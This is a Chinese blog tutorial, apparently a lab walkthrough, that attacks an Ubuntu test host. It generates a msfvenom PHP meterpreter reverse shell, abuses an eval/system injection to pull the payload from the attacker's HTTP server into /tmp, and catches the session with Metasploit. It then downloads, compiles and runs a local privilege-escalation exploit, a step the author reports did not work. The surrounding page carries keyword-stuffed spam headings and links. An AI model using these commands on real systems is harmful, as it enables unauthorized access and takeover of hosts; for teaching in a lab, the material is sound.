当前位置: 首页 > wzjs >正文

兰溪网站建设学徒北京网站推广公司

兰溪网站建设学徒,北京网站推广公司,国家工商网查询企业信息,住房城乡建设部 网站首先metasploit是什么呢,该怎末使用呢 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发&…

首先metasploit是什么呢,该怎末使用呢

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

下边这篇文章告诉哦你

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

然后我们呢开始实验

首先准备环境

我们的kail机 ip 192.168.25.138 (这个相信你们都有)

还有上一篇文章的 Ubuntu 主机 ip 192.168.25.135 (这个就是上一篇下载的那个 没有的 我再次放在下边)

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: 33g3

--来自百度网盘超级会员v3的分享

我们首先打开我们的kail机

输入 ifconfig

我们的ip是192.68.25.138

首先我们先要生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.25.138 LPORT=12345 -f raw >shell.php

不知道msfvenom 是啥的

msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名

参考这一篇文章

msfvenom的使用&免杀&外网渗透_msfvalenem-CSDN博客

我就可以看到桌面上有了shell.php

我们来查看一下源代码

我们的目的 就是要把这个攻击载荷 下载到目标主机上

还是一样的

我们首先要开启80端口服务

python3 -m http.server 80

还是老样子

在我们的本机上windows上输入 192.168.25.135

然后打开eval函数 超链接

输入 system 函数

data=system('ls -al');

然后我们查看上一级目录

data=system('ls -al ../');

我们看到了tmp目录 那个临时目录 是谁都可以访问修改的

那我们就进入tmp目录 等下下载到这个目录里

data=system('ls -al ../tmp');

然后我们还是可以用一个反弹shell 然后输入指令 使用wegt或者curl进行下载

这里我们是php代码 咋们可以用php的一个函数来解决

file_get_contents 它可以本地请求 也可以远程http请求

想了解更多的 我们可以看下一篇文章

file_get_contents() 函数详解与使用_php file get contents-CSDN博客

file_get_contents('http://192.168.25.138/shell.php');

看不到内容 我们可以打印出来

echo file_get_contents('http://192.168.25.138/shell.php');

内容跟我们生成的攻击载荷一摸一样

下载我们就要开始写入文件了

file_put_contents函数

不懂得 可以看这一篇文章

php 读写文件 file_put_contents() 与 file_get_contents() 函数用法-CSDN博客

file_put_contents('../tmp/shell.php',file_get_contents('http://192.168.25.138/shell.php'));

现在让我们来查看Ubuntu主机上 有没有下载好没有这个shell.php文件

data=system('ls -al ../tmp');

然后接下来我们启动kail的msf(这里我就不在过多讲解 msf 相信你们都是业内人士)

msfconsole

然后使用监听模块

use exploit/multi/handler

然后设置payload

set payloadphp/meterpreter_reverse_tcp

输入

show options

查看要添加的参数名称

设置参数

set lhost 192.168.25.138 (kail的ip)

set lport 12345 (设置成为与攻击载荷相同的端口)

然后哦我们输入

run

开始监听

然后我们在我们的本机上输入 来访问shell.php

http://192.168.25.135/tmp/shell.php

然后返回kail 已经有了 meterpreter

大家这里不要管我这里的ip怎末变成了192.168.25.136 而不是192.168.25.135(我这里的ip变换了 大家不用管 就按照原来的走)

输入

getuid 查询当前用户

然后查看主机版本

sysinfo

然后我们进入shell

输入id

查询Ubuntu版本

cat /etc/issue

然后我们退出shell 到 meterpreter

exit

我们也可以使用 msf自带的后渗透模块来查询

run post/multi/recon/local_exploit_suggester

然后等待查询结束

这里没有查询到

然后还是一样的

在这个漏洞库查找

https://www.exploit-db.com/exploits/37292

还是上篇找到的 37292.c

虽然上次没有提权成功 因为这个漏洞不稳定

我们这次再试试

首先进入shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

然后下载

curl http://192.168.25.138/37292.c -o /tmp/37292.c

然后进行编译

gcc 37292.c -o exp

输入

./exp

进行运行

这里还是没有成功 哎 太可惜了 很想给你们运行一遍

反正思路就是这个思路

大家可以找别的版本来运行一遍

http://www.dtcms.com/wzjs/140404.html

相关文章:

  • 深圳松岗 网站建设镇江推广公司
  • 什么是网络营销宏观环境因素网站优化排名易下拉软件
  • 之前做的网站说要升级六年级下册数学优化设计答案
  • 公司产品网站应该怎么做上海优化网站公司哪家好
  • 淮北做网站的公司有哪些引流用什么话术更吸引人
  • 西安政府网站开发公司外贸网站设计
  • 河北手机网站制作企业如何获取网站的seo
  • 东莞住房和城乡建设厅网站百度2022新版下载
  • 做蛋糕网站有哪些怎么宣传自己的店铺
  • b2c网站建设方案seo课程总结怎么写
  • 做阿里巴巴网站电话网站建设seo
  • 廉洁文化建设网站买卖网站
  • 番禺网站制作价格重庆seo点击工具
  • 中山建设招聘信息网站抖音seo关键词排名技术
  • 如何做酒网站产品推广软文500字
  • 厦门 网站建设公司seo推广营销网站
  • 做网站怎么做放大图片怎么进行网站关键词优化
  • 情趣官方网站怎么做代理外链发布平台大全
  • wordpress 百度cdn无锡seo优化公司
  • 网站开发者模式个人网站搭建
  • 网站内容设计是什么东莞网站建设制作
  • 新网站建设验收广州番禺发布网
  • 成品影视app开发工具seo引擎优化外包
  • 装修设计网站免费免费的网站推广在线推广
  • 企业做网站需要提交的资料表格新河seo怎么做整站排名
  • 网站建设中html5源码google seo 优化教程
  • 国内做焊接机器人平台网站人工智能培训心得
  • 出售源码的网站怎么做网站模板
  • 网上学习做网站网站推广上首页
  • 网站建设注册密码咋弄百度助手安卓版下载